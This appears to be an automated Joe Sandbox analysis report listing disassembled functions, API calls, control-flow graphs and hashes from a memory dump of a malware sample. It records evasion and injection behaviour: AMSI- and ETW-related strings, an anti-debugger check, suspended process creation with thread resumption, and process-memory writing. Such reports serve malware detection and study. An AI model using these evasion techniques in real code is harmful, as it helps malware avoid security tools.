                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                        • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                        • API String ID: 1759228003-3917250287
                                        • Opcode ID: 564db707730630ef2b864df15379ae6b5c78e9f84d3c5d929d81b39b8a179cda
                                        • Instruction ID: 7288f14fa6640d5259336a3f0f65ce3746f7c28728a4f1bfba5985f0f55c0b83
                                        • Opcode Fuzzy Hash: 564db707730630ef2b864df15379ae6b5c78e9f84d3c5d929d81b39b8a179cda
                                        • Instruction Fuzzy Hash: 56518571E4024C7EFB25D6A4CC46FEF7BAD9B48784F8401A5AA04E61C1DBB49B449FA0
                                        Function 02C8DACC Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DB0B
                                        • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02C8DB72
                                        • NtClose.NTDLL(?), ref: 02C8DB7B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Path$CloseFileNameName_Write
                                        • String ID:
                                        • API String ID: 1792072161-0
                                        • Opcode ID: 4bd64617c7b15beae0a9915888d9b8e870c4840db91375e51c49fec15a05b748
                                        • Instruction ID: 9fc5cff668823b4bdf9e4b499a25324f1516ab2c46fa5c559745196986c0b2e1
                                        • Opcode Fuzzy Hash: 4bd64617c7b15beae0a9915888d9b8e870c4840db91375e51c49fec15a05b748
                                        • Instruction Fuzzy Hash: 8021ED71A40308BAEB24EAE4CC46FEEB7BDEB04B04F604161B601F71C0D7B06A04DB65
                                        Function 02C8DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • RtlInitUnicodeString.NTDLL ref: 02C8DA6C
                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02C8DA82
                                        • NtDeleteFile.NTDLL(?), ref: 02C8DAA1
                                          • Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(?), ref: 02C74C1A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                        • String ID:
                                        • API String ID: 2256775434-0
                                        • Opcode ID: 81ea543f968e6ca68a3241f3ad7544262ccd144831241da713b8483d63bd6248
                                        • Instruction ID: cfad5da123f1e33068cc3b7f47d2edb6cfaff18883fe1a60b8654ab15f7ca81b
                                        • Opcode Fuzzy Hash: 81ea543f968e6ca68a3241f3ad7544262ccd144831241da713b8483d63bd6248
                                        • Instruction Fuzzy Hash: 9F01E171944208BADB15FAE0CD51FDEB7BDEB48B14F614471A501E2180EB746B049B64
                                        Function 02C8DBB0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DBEB
                                        • NtClose.NTDLL(?), ref: 02C8DC65
                                          • Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(?), ref: 02C74C1A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Path$CloseFreeNameName_String
                                        • String ID:
                                        • API String ID: 11680810-0
                                        • Opcode ID: cac9a03b5778d1937095da60ceca8210b340dd98a2daa873efbb7f73e8e5799b
                                        • Instruction ID: 9e1255c1b7ef153764cf9437209bbf13b0b7d60e8179a9ee9914d1e5dbc10eff
                                        • Opcode Fuzzy Hash: cac9a03b5778d1937095da60ceca8210b340dd98a2daa873efbb7f73e8e5799b
                                        • Instruction Fuzzy Hash: 3B21F171A50308BAEB15FAE4CC46FDEB7BDEB08B04F504561B601F71C0D6B4AA449B65
                                        Function 02C97877 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2772processthreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5349 2c97877-2c97c67 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c74898 5464 2c97c6d-2c97e40 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c74798 call 2c7494c call 2c74d20 call 2c74d9c CreateProcessAsUserW 5349->5464 5465 2c98af1-2c98c74 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c74898 5349->5465 5572 2c97ebe-2c97fc9 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 5464->5572 5573 2c97e42-2c97eb9 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 5464->5573 5554 2c98c7a-2c98c89 call 2c74898 5465->5554 5555 2c99420-2c9aa25 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 * 16 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c746a4 * 2 call 2c88824 call 2c87b98 call 2c8818c call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 ExitProcess 5465->5555 5554->5555 5564 2c98c8f-2c98f62 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c8e540 call 2c7480c call 2c7494c call 2c746a4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c77e18 5554->5564 5822 2c98f68-2c99215 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c74d8c * 2 call 2c74734 call 2c8dacc 5564->5822 5823 2c9921a-2c9941b call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c749a4 call 2c88bb0 5564->5823 5675 2c97fcb-2c97fce 5572->5675 5676 2c97fd0-2c982f0 call 2c749a4 call 2c8dc90 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c8cfa4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 5572->5676 5573->5572 5675->5676 5992 2c98309-2c98aec call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 ResumeThread call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 CloseHandle call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c87ed4 call 2c887a0 * 6 CloseHandle call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c88824 5676->5992 5993 2c982f2-2c98304 call 2c88584 5676->5993 5822->5823 5823->5555 5992->5465 5993->5992
                                        APIs
                                          • Part of subcall function 02C88824: FreeLibrary.KERNEL32(02CD1384,00000000,02CD1388,Function_000055D8,00000004,02CD1398,02CD1388,05F5E0FF,00000040,02CD139C,02CD1384,00000000,00000000,00000000,00000000,02C8890B), ref: 02C888EB
                                        • CreateProcessAsUserW.ADVAPI32(02DC57D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC57DC,02DC5820,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80), ref: 02C97E39
                                        • ResumeThread.KERNEL32(02DC5824,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80,02C9AFD8,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8), ref: 02C98483
                                        • CloseHandle.KERNEL32(02DC5820,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80,02C9AFD8,02DC5824,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80), ref: 02C98602
                                          • Part of subcall function 02C887A0: LoadLibraryW.KERNEL32(?,?), ref: 02C887B4
                                          • Part of subcall function 02C887A0: GetProcAddress.KERNEL32(02CD1390,BCryptVerifySignature), ref: 02C887CE
                                          • Part of subcall function 02C887A0: FreeLibrary.KERNEL32(02CD1390,02CD1390,BCryptVerifySignature,bcrypt,?,02CD13D0,00000000,02CD13A4,02C8A3C7,ScanString,02CD13A4,02C8A77C,ScanBuffer,02CD13A4,02C8A77C,Initialize), ref: 02C8880A
                                        • CloseHandle.KERNEL32(02DC5820,02DC5820,ScanBuffer,02CCCE80,02C9AFD8,UacInitialize,02CCCE80,02C9AFD8,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80), ref: 02C989F4
                                          • Part of subcall function 02C8DACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DB0B
                                          • Part of subcall function 02C8DACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02C8DB72
                                          • Part of subcall function 02C8DACC: NtClose.NTDLL(?), ref: 02C8DB7B
                                          • Part of subcall function 02C8818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C88216), ref: 02C881F8
                                        • ExitProcess.KERNEL32(00000000,OpenSession,02CCCE80,02C9AFD8,ScanBuffer,02CCCE80,02C9AFD8,Initialize,02CCCE80,02C9AFD8,00000000,00000000,00000000,ScanString,02CCCE80,02C9AFD8), ref: 02C9AA25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                        • API String ID: 376050052-1225450241
                                        • Opcode ID: 3668a8f33b12cfe72e2834338013b5c9a2d05b92b701b6ea41f5b5ab7f193a27
                                        • Instruction ID: 41c413fa018082d58aa864918414af2ce486dcfcd21e70b5b88d374fc9b2b005
                                        • Opcode Fuzzy Hash: 3668a8f33b12cfe72e2834338013b5c9a2d05b92b701b6ea41f5b5ab7f193a27
                                        • Instruction Fuzzy Hash: BC432BB5B901589BCF25EB68DD809DE73BAFF89304F5041E5E009AB610DB31AE85EF50
                                        Function 02C8EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 9720 2c8ebf0-2c8ec0a GetModuleHandleW 9721 2c8ec0c-2c8ec1e GetProcAddress 9720->9721 9722 2c8ec36-2c8ec3e 9720->9722 9721->9722 9723 2c8ec20-2c8ec30 CheckRemoteDebuggerPresent 9721->9723 9723->9722 9724 2c8ec32 9723->9724 9724->9722
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02C8EC00
                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C8EC12
                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C8EC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                        • API String ID: 35162468-539270669
                                        • Opcode ID: 13a5f383cb6a1a8bbcf428519de700b82180447b07fc7e6f6af088c6cac10105
                                        • Instruction ID: f23f041a1f8d0a15380474b24e92a784375b0844f53b35c482ebbd49f4d47afa
                                        • Opcode Fuzzy Hash: 13a5f383cb6a1a8bbcf428519de700b82180447b07fc7e6f6af088c6cac10105
                                        • Instruction Fuzzy Hash: A5F0A070D0464CAAEB22B7A888897DDFBAD6B0532CFA483A4F534621C1E7750784C651
                                        Function 02C71A8F Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 9725 2c71a8f-2c71a9b 9726 2c71aa1-2c71aa5 9725->9726 9727 2c71b6c-2c71b6f 9725->9727 9730 2c71aa7-2c71aae 9726->9730 9731 2c71b08-2c71b11 9726->9731 9728 2c71b75-2c71b7f 9727->9728 9729 2c71c5c-2c71c60 9727->9729 9732 2c71b81-2c71b8d 9728->9732 9733 2c71b3c-2c71b49 9728->9733 9736 2c71c66-2c71c6b 9729->9736 9737 2c716e8-2c7170b call 2c71644 VirtualFree 9729->9737 9734 2c71ab0-2c71abb 9730->9734 9735 2c71adc-2c71ade 9730->9735 9731->9730 9738 2c71b13-2c71b27 Sleep 9731->9738 9742 2c71bc4-2c71bd2 9732->9742 9743 2c71b8f-2c71b92 9732->9743 9733->9732 9741 2c71b4b-2c71b5f Sleep 9733->9741 9744 2c71ac4-2c71ad9 9734->9744 9745 2c71abd-2c71ac2 9734->9745 9746 2c71af3 9735->9746 9747 2c71ae0-2c71af1 9735->9747 9753 2c71716 9737->9753 9754 2c7170d-2c71714 9737->9754 9738->9730 9740 2c71b2d-2c71b38 Sleep 9738->9740 9740->9731 9741->9732 9749 2c71b61-2c71b68 Sleep 9741->9749 9750 2c71b96-2c71b9a 9742->9750 9752 2c71bd4-2c71bd9 call 2c714c0 9742->9752 9743->9750 9751 2c71af6-2c71b03 9746->9751 9747->9746 9747->9751 9749->9733 9755 2c71bdc-2c71be9 9750->9755 9756 2c71b9c-2c71ba2 9750->9756 9751->9728 9752->9750 9759 2c71719-2c71723 9753->9759 9754->9759 9755->9756 9760 2c71beb-2c71bf2 call 2c714c0 9755->9760 9761 2c71bf4-2c71bfe 9756->9761 9762 2c71ba4-2c71bc2 call 2c71500 9756->9762 9760->9756 9764 2c71c00-2c71c28 VirtualFree 9761->9764 9765 2c71c2c-2c71c59 call 2c71560 9761->9765
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 02C71B17
                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02C71B31
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 45779180e7b3ca493208e68264fdadcfe1d2d8dbf8bcd369d61514a1a3ed35eb
                                        • Instruction ID: f783dfde58ec23338b9dd34be6f18c108ec231270a3c73be1f4fdeea6e2bbfa7
                                        • Opcode Fuzzy Hash: 45779180e7b3ca493208e68264fdadcfe1d2d8dbf8bcd369d61514a1a3ed35eb
                                        • Instruction Fuzzy Hash: D651F1B16103408FE715CF68C984756BBD0EB86324F2C86AED44CCB282E7F0D645CBA1
                                        Function 02C8ABD8 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02C8A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C8ABE3,?,?,02C8AC75,00000000,02C8AD51), ref: 02C8A970
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C8A988
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C8A99A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C8A9AC
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C8A9BE
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C8A9D0
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C8A9E2
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C8A9F4
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C8AA06
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C8AA18
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C8AA2A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C8AA3C
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C8AA4E
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C8AA60
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C8AA72
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C8AA84
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C8AA96
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02C8AC75,00000000,02C8AD51), ref: 02C8ABE9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2242398760-0
                                        • Opcode ID: f7d81002eca7dc259a61c74374902e198e9149dc6e230d76eee5f454636a7697
                                        • Instruction ID: 29cdb883cdfa778b80dede38c9ef74a8e8cc1b98be1d03a9d158246b49e57626
                                        • Opcode Fuzzy Hash: f7d81002eca7dc259a61c74374902e198e9149dc6e230d76eee5f454636a7697
                                        • Instruction Fuzzy Hash: DBC08CA26022301B8B107AF83C889D3578DCE891BA30888A3B609D3102E7698C10A2B0
                                        Function 02C8ABF8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02C8A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C8ABE3,?,?,02C8AC75,00000000,02C8AD51), ref: 02C8A970
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C8A988
